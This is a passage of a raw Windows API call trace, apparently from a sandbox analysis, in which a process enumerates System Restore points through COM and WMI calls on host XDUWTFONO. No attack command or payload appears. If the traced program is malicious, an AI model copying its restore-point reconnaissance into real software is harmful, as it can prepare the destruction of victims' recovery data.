Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.794] WbemDefPath:IUnknown:AddRef (This=0x6025370) returned 0x3 [0122.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1558) returned 0x0 [0122.794] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1558, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.794] WbemDefPath:IUnknown:Release (This=0xbe1558) returned 0x3 [0122.794] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.794] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.795] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x2 [0122.795] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x1 [0122.795] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.795] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025370) returned 0x0 [0122.795] WbemDefPath:IUnknown:AddRef (This=0x6025370) returned 0x3 [0122.795] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x2 [0122.795] WbemDefPath:IWbemPath:SetText (This=0x6025370, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=11") returned 0x0 [0122.795] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.795] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.795] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.795] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.795] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.795] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.795] IWbemClassObject:Get (in: This=0x6026368, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a0a88*=0, plFlavor=0x38a0a8c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), pType=0x38a0a88*=19, plFlavor=0x38a0a8c*=0) returned 0x0 [0122.795] IWbemClassObject:Get (in: This=0x6026368, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a0a88*=19, plFlavor=0x38a0a8c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), pType=0x38a0a88*=19, plFlavor=0x38a0a8c*=0) returned 0x0 [0122.795] CoTaskMemAlloc (cb=0x4) returned 0xbe1598 [0122.795] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1598, puReturned=0x389bfe4 | out: apObjects=0xbe1598*=0x6026650, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.796] IUnknown:QueryInterface (in: This=0x6026650, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6026650) returned 0x0 [0122.796] IUnknown:QueryInterface (in: This=0x6026650, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.796] IUnknown:QueryInterface (in: This=0x6026650, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.796] IUnknown:AddRef (This=0x6026650) returned 0x3 [0122.796] IUnknown:QueryInterface (in: This=0x6026650, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.796] IUnknown:QueryInterface (in: This=0x6026650, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.797] IUnknown:QueryInterface (in: This=0x6026650, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6026654) returned 0x0 [0122.797] IMarshal:GetUnmarshalClass (in: This=0x6026654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.797] IUnknown:Release (This=0x6026654) returned 0x3 [0122.797] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.797] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.797] IUnknown:QueryInterface (in: This=0x6026650, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.797] IUnknown:Release (This=0x6026650) returned 0x2 [0122.797] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.797] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.797] IUnknown:QueryInterface (in: This=0x6026650, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6026650) returned 0x0 [0122.797] IUnknown:AddRef (This=0x6026650) returned 0x4 [0122.797] IUnknown:Release (This=0x6026650) returned 0x3 [0122.797] IUnknown:Release (This=0x6026650) returned 0x2 [0122.797] CoTaskMemFree (pv=0xbe1598) [0122.797] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.797] IUnknown:AddRef (This=0x6026650) returned 0x3 [0122.797] IWbemClassObject:Get (in: This=0x6026650, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.797] IWbemClassObject:Get (in: This=0x6026650, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=12", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.797] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=12") returned 0x70 [0122.797] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=12") returned 0x70 [0122.797] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.797] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.798] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.798] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.798] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x60248a0) returned 0x0 [0122.798] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.798] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x60253e0) returned 0x0 [0122.798] WbemDefPath:IUnknown:Release (This=0x60248a0) returned 0x0 [0122.798] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x60253e0) returned 0x0 [0122.799] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.799] WbemDefPath:IUnknown:AddRef (This=0x60253e0) returned 0x3 [0122.799] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.799] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.799] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1598) returned 0x0 [0122.799] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1598, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.799] WbemDefPath:IUnknown:Release (This=0xbe1598) returned 0x3 [0122.799] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.799] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.799] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.799] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x2 [0122.799] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x1 [0122.799] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.799] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.799] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x60253e0) returned 0x0 [0122.799] WbemDefPath:IUnknown:AddRef (This=0x60253e0) returned 0x3 [0122.799] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x2 [0122.799] WbemDefPath:IWbemPath:SetText (This=0x60253e0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=12") returned 0x0 [0122.800] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.800] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.800] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.800] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.800] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.800] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.800] IWbemClassObject:Get (in: This=0x6026650, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a12d8*=0, plFlavor=0x38a12dc*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), pType=0x38a12d8*=19, plFlavor=0x38a12dc*=0) returned 0x0 [0122.800] IWbemClassObject:Get (in: This=0x6026650, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a12d8*=19, plFlavor=0x38a12dc*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), pType=0x38a12d8*=19, plFlavor=0x38a12dc*=0) returned 0x0 [0122.800] CoTaskMemAlloc (cb=0x4) returned 0xbe15d8 [0122.800] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe15d8, puReturned=0x389bfe4 | out: apObjects=0xbe15d8*=0x6026908, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.801] IUnknown:QueryInterface (in: This=0x6026908, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6026908) returned 0x0 [0122.801] IUnknown:QueryInterface (in: This=0x6026908, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.801] IUnknown:QueryInterface (in: This=0x6026908, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.801] IUnknown:AddRef (This=0x6026908) returned 0x3 [0122.801] IUnknown:QueryInterface (in: This=0x6026908, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.801] IUnknown:QueryInterface (in: This=0x6026908, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.801] IUnknown:QueryInterface (in: This=0x6026908, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x602690c) returned 0x0 [0122.802] IMarshal:GetUnmarshalClass (in: This=0x602690c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.802] IUnknown:Release (This=0x602690c) returned 0x3 [0122.802] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.802] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.802] IUnknown:QueryInterface (in: This=0x6026908, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.802] IUnknown:Release (This=0x6026908) returned 0x2 [0122.802] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.802] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.802] IUnknown:QueryInterface (in: This=0x6026908, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6026908) returned 0x0 [0122.802] IUnknown:AddRef (This=0x6026908) returned 0x4 [0122.802] IUnknown:Release (This=0x6026908) returned 0x3 [0122.802] IUnknown:Release (This=0x6026908) returned 0x2 [0122.802] CoTaskMemFree (pv=0xbe15d8) [0122.802] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.802] IUnknown:AddRef (This=0x6026908) returned 0x3 [0122.802] IWbemClassObject:Get (in: This=0x6026908, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.802] IWbemClassObject:Get (in: This=0x6026908, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=13", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.802] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=13") returned 0x70 [0122.802] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=13") returned 0x70 [0122.802] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.802] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.802] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.802] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.803] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x60248b0) returned 0x0 [0122.803] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.803] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, 